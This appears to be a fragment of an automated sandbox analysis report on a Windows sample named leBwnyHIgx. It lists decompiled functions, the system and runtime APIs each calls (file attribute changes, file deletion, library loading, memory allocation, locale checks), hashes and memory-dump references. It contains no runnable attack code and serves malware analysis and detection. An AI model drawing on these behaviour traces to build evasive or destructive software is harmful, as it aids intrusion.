                                                                                    • String ID:
                                                                                    • API String ID: 2577077003-0
                                                                                    • Opcode ID: 3d5d65c2c7976f4b4aae160312df689aeeaf5d43f4e73ea647558735ff45e0be
                                                                                    • Instruction ID: 90efd60632e2d823e52567890d799542f586c4bd548bb1fa8c7a4ffe1eb11bac
                                                                                    • Opcode Fuzzy Hash: 3d5d65c2c7976f4b4aae160312df689aeeaf5d43f4e73ea647558735ff45e0be
                                                                                    • Instruction Fuzzy Hash: 4D2117B1940219EBEB00DF94CC95BEEBBB4FB08740F108529F515AB290DB74AB45CB90
                                                                                    Function 10005300 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                    • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1001092F,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10012400: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?write@?$basic_ostream@AttributesBios_base@std@@FileV12@
                                                                                    • String ID:
                                                                                    • API String ID: 1581416325-0
                                                                                    • Opcode ID: 32f54b1f899ee1af3aba59885187cc1cdca026de1e16f01f9de73927c4a3acad
                                                                                    • Instruction ID: 5c88ff171285725a0febf88608a5dc827106f22a602be97f7403975b38e1ce9c
                                                                                    • Opcode Fuzzy Hash: 32f54b1f899ee1af3aba59885187cc1cdca026de1e16f01f9de73927c4a3acad
                                                                                    • Instruction Fuzzy Hash: CA215970A00109ABEB54DF64CC95FAEB774FB04750F108268F51AAB2D0DB70AA85CF94
                                                                                    Function 0040CA88 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040CB9F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040CC26,00000000,?,00000105), ref: 0040CB33
                                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040CB9F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040CC26,00000000,?,00000105), ref: 0040CB5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguage$SystemUser
                                                                                    • String ID:
                                                                                    • API String ID: 384301227-0
                                                                                    • Opcode ID: 20e8ba98e2816f8af13bed9515c1d960020764da17156fa36e2f3308999935a6
                                                                                    • Instruction ID: 44e41ead65ef66f727125de80912159cd7281fcfb7f7393cce7e535fa76c4ae3
                                                                                    • Opcode Fuzzy Hash: 20e8ba98e2816f8af13bed9515c1d960020764da17156fa36e2f3308999935a6
                                                                                    • Instruction Fuzzy Hash: D4312E70A10209DBDB10EB99D8C2AAEB7B5EB44304F50467BE400B72D5DB78AD45CB99
                                                                                    Function 100135C0 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000022,00000040,1001304F,000000FF,?,1001304F,00000040,00000022,?), ref: 100135F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Fiopen@std@@U_iobuf@@
                                                                                    • String ID:
                                                                                    • API String ID: 2284775142-0
                                                                                    • Opcode ID: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
                                                                                    • Instruction ID: 655dba523039e8c1ca7b53558f86e7561812b5aaf6b8d3e237c0567069c37aa1
                                                                                    • Opcode Fuzzy Hash: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
                                                                                    • Instruction Fuzzy Hash: 08213AB5D04209EFCB04DF98CC81BAEB7B4FB48750F108628E526A7390D735AA50CBA0
                                                                                    Function 0040CBAC Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CBE8
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CC39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 1159719554-0
                                                                                    • Opcode ID: 4383079db15fcd8ef662a46fade05db089f3147d55ebe15ae5cef73a62b66191
                                                                                    • Instruction ID: c1507673094f8c5292584a269d2518184869565b67f53896f9c973a0a4d881f3
                                                                                    • Opcode Fuzzy Hash: 4383079db15fcd8ef662a46fade05db089f3147d55ebe15ae5cef73a62b66191
                                                                                    • Instruction Fuzzy Hash: 8411BF70A4420CABEB10EF60CD86BDD73B8DB04704F5041BAB408B32C1DA385F80CA99
                                                                                    Function 00428614 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 0042861E
                                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,00428668,?,00000000,00428686,?,00008000), ref: 0042864D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    • Opcode ID: 46fa6bf7c39c9205b4f2e33c71be27e1bd0f5d6462176cf82db7d2d05287f296
                                                                                    • Instruction ID: 872fb0b1150bba30eaf2acd4e0c3a99a1078ee24a947000b27c0355be161ab5f
                                                                                    • Opcode Fuzzy Hash: 46fa6bf7c39c9205b4f2e33c71be27e1bd0f5d6462176cf82db7d2d05287f296
                                                                                    • Instruction Fuzzy Hash: 81F02770A14744BFDB119F768C6286FBBECE70DB0079348BAF900E2A91EA3C4810C568
                                                                                    Function 0040E4B8 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040E4FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    • Opcode ID: 8f13a3bbcb92e65e3f2aea17991442021eb2561ecef5d5fcc5ebd3e194779de1
                                                                                    • Instruction ID: a47970919856236c0168dc23f1bd1acf46059580e87ddf9fa247c61dd49d6e22
                                                                                    • Opcode Fuzzy Hash: 8f13a3bbcb92e65e3f2aea17991442021eb2561ecef5d5fcc5ebd3e194779de1
                                                                                    • Instruction Fuzzy Hash: 84F096B1700200ABDB10DA5ECCC5B5732CC9B58349F048876B508EB396EA38DC1487AA
                                                                                    Function 10012F10 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 10012C90: ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(100053B9,?,10012F2A,?,100053B9), ref: 10012C9A
                                                                                      • Part of subcall function 10012C90: ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(CCC35DE5,CCC35DE5,8B55CCCC,?,10012F2A,?,100053B9), ref: 10012CC2
                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?setg@?$basic_streambuf@D00@fclose
                                                                                    • String ID:
                                                                                    • API String ID: 2996004546-0
                                                                                    • Opcode ID: 709d4a9117c949bef376609371d5c1e3fdd0bce17311b82dc2022546a51ab83c
                                                                                    • Instruction ID: a9d9b0767c6718a53788ed456b677ecfb587c67211e8534dc0a09bbe97dd6693
                                                                                    • Opcode Fuzzy Hash: 709d4a9117c949bef376609371d5c1e3fdd0bce17311b82dc2022546a51ab83c
                                                                                    • Instruction Fuzzy Hash: C001C9B4A04209EBDB04DF94D996B9DBBB5EF40704F2080A8E9016F391DB71EF95DB81
                                                                                    Function 0040B920 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040B93E
                                                                                      • Part of subcall function 0040CBAC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CBE8
                                                                                      • Part of subcall function 0040CBAC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CC39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 4113206344-0
                                                                                    • Opcode ID: 92830e843a0290b8fb819179a769738ed0c8430f51dc52ce8e13e1d58c902946
                                                                                    • Instruction ID: b028abd3538c11208bb69536d004979ed80801884fb39c7b18fc8ecc13332f26
                                                                                    • Opcode Fuzzy Hash: 92830e843a0290b8fb819179a769738ed0c8430f51dc52ce8e13e1d58c902946
                                                                                    • Instruction Fuzzy Hash: DDE0EDB1A403109BCB10DF58C8C5A473BE8AB08754F044A66ED68DF386D375DD1087D5
                                                                                    Function 10012400 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 10012F10: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?setstate@?$basic_ios@D@std@@@std@@U?$char_traits@fclose
                                                                                    • String ID:
                                                                                    • API String ID: 2040537880-0
                                                                                    • Opcode ID: 93dd7eb5169e86885b55c767c8327cd94ed4ae90235ab5dc8049e23af4a0f4b1
                                                                                    • Instruction ID: b5d0b15e863f3ba68657ea4ca4a108191cbcefbbccc9c59a0a057f78330705e7
                                                                                    • Opcode Fuzzy Hash: 93dd7eb5169e86885b55c767c8327cd94ed4ae90235ab5dc8049e23af4a0f4b1
                                                                                    • Instruction Fuzzy Hash: 1FE01A74A00208EFDB08DB94C981B6CBBB5EF85305F6081A8D9066B381D631AE22DB84
                                                                                    Function 10005520 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileA.KERNEL32(100108FE,?,100108FE,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                    • Instruction ID: f2f8e3d453fe78865ccc53f7e24a17e21a0dec87b166a9a16b5ac37ce018f2ca
                                                                                    • Opcode Fuzzy Hash: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                    • Instruction Fuzzy Hash: 5BC02B7520471C57AF808EE4BC448CB33ECD7095C33004000FE0CCB100C532E7019B60
                                                                                    Function 10005740 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,?,100115DD,?,00000000,?,?,?,?,?,?,00000063,?,00000070,?), ref: 10005751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                    • Instruction ID: ee6079dce25d93f15e917eacbc87c037c8b3b96b664cac2b0563e90788469a29
                                                                                    • Opcode Fuzzy Hash: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                    • Instruction Fuzzy Hash: BEB09B3454030C67D5446B51DC59E15771CF7456D1F004450F94D57151CF75FA4447D8
                                                                                    Function 0042866F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,0042868D), ref: 00428680
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 66a180434acd903a05dc67d5e34fa237f32a14c00a9ee3962d59800cd762fd6b
                                                                                    • Instruction ID: 696cc173350d5948746636284ada699740c3da0e40302307c28099bcb0f56c81
                                                                                    • Opcode Fuzzy Hash: 66a180434acd903a05dc67d5e34fa237f32a14c00a9ee3962d59800cd762fd6b
                                                                                    • Instruction Fuzzy Hash: 77B09B7670C2145EAF05DBA5791155C67D4D7C87107E1446BF114C3540D97C54148528
                                                                                    Function 10004A70 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: allocator
                                                                                    • String ID:
                                                                                    • API String ID: 3447690668-0
                                                                                    • Opcode ID: 817b939fb322faf8aa4a8908d91c84128208cf71eecda2aa4e4aa1b252350f97
                                                                                    • Instruction ID: 49106881f87acc91c15ffb423cd80b113fa76448b9a27e8f77458942fb597c13
                                                                                    • Opcode Fuzzy Hash: 817b939fb322faf8aa4a8908d91c84128208cf71eecda2aa4e4aa1b252350f97
                                                                                    • Instruction Fuzzy Hash: 7EC0927425820CAB8B08DF88E891C6973ADEB89650B008169BC0E8B352CE30BD40CA9D
                                                                                    Function 00403C6C Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,-00000004,000000BF,00404283,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD), ref: 00403C83
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
